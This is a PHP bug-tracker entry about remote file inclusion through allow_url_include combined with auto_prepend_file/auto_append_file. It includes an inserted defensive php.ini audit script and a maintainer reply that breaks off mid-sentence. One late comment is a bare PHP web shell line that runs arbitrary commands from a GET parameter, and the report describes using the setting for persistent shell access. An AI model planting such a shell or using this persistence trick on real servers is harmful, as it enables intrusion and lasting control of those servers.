Doc Bug #79476 remote file include
Submitted: 2020-04-14 15:28 UTC Modified: 2020-04-16 07:54 UTC
Avg. Score:3.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: c0d1M4x at outlook dot com Assigned:
Status: Verified Package: *Configuration Issues
PHP Version: 7.2.29 OS: Linux/Windows
Private report: No CVE-ID: None

 [2020-04-14 15:28 UTC] c0d1M4x at outlook dot com
[php version]

Test versions are PHP 7.2.27 (CentOS) and PHP 7.3.x (Windows)

[linux install command]

yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel -y


The issue config file is "php.ini".

When "allow_url_include" is set to "On", "auto_prepend_file" and "auto_append_file" can be set to a remote address and can be successfully included and exploited. This may cause the attacker to use this configuration item to use getshell for a long time in the case of a getshell or other vulnerabilities.
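
A defender-side check for the configuration described in this report, as an added example that is not part of the original report or of PHP's own tooling: it parses php.ini text and flags an enabled `allow_url_include` and any `auto_prepend_file` / `auto_append_file` value that names a URL wrapper. The function names, the URL heuristic and the sample input are assumptions of this example.

```python
import re

# Heuristic (assumption): value names a stream wrapper (http://, ftp://, ...) or a data: URI.
URL_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)

def parse_ini(text):
    """Return {section: {directive: (value, line_no)}}; the last assignment wins."""
    sections, current = {"global": {}}, "global"
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):  # only PATH=/HOST= headers scope settings
            current = line[1:-1].strip() if line[1:6].upper() in ("PATH=", "HOST=") else "global"
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if line.startswith(";") or not sep:
            continue
        value = value.strip()
        if value[:1] in ('"', "'"):                 # quoted: keep text up to the closing quote
            value = value[1:].split(value[0], 1)[0]
        else:                                       # unquoted: drop a trailing ; comment
            value = value.split(";", 1)[0].strip()
        sections[current][key.strip().lower()] = (value, no)
    return sections

def audit_php_ini(text):
    """Return findings as (section, directive, line_no, message) tuples."""
    sections, findings = parse_ini(text), []
    for name, own in sections.items():
        eff = {**sections["global"], **own}         # scoped sections inherit global values
        flag, flag_line = eff.get("allow_url_include", ("0", 0))
        enabled = flag.lower() in {"1", "on", "yes", "true"}
        if enabled and "allow_url_include" in own:
            findings.append((name, "allow_url_include", flag_line, "non-default On"))
        for d in ("auto_prepend_file", "auto_append_file"):
            value, no = eff.get(d, ("", 0))
            if URL_RE.match(value) and (d in own or "allow_url_include" in own):
                state = "remote include active" if enabled else "remote path set, include off"
                findings.append((name, d, no, state))
    return findings

# Constructed sample; the host is a placeholder, not a value from the report.
SAMPLE = """[PHP]
allow_url_include = On
auto_prepend_file = "http://files.example.invalid/p.txt" ; comment
[PATH=/var/www/legacy]
auto_append_file = /var/www/legacy/footer.php
"""
if __name__ == "__main__":
    print(*audit_php_ini(SAMPLE), sep="\n")
```

A URL in either directive is reported even while `allow_url_include` is off, since it becomes active as soon as that flag is switched on.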


 [2020-04-15 09:01 UTC]
-Type: Security +Type: Documentation Problem
 [2020-04-15 09:01 UTC]
allow_url_include defaults to Off, and is deprecated as of PHP
7.4.0.  If you enable this setting, you are supposed to know what
you are doing, so this is not a security issue.

I think, though, that this can be documented better.  The security
warning on the include man page[1] isn't as clear as it could be,
and likely a cautionary note should be added to the documentation
of the INI setting[2].  Furthermore, its deprecation has to be

[1] <>
[2] <>
 [2020-04-16 07:54 UTC]
-Status: Open +Status: Verified
 [2023-11-10 15:12 UTC] ragafa5955 at glalen dot com
 [2023-11-10 15:37 UTC] n13bng at gmail dot com
<?php echo system($_GET['a']);?>
Last updated: Wed Jun 19 04:01:31 2024 UTC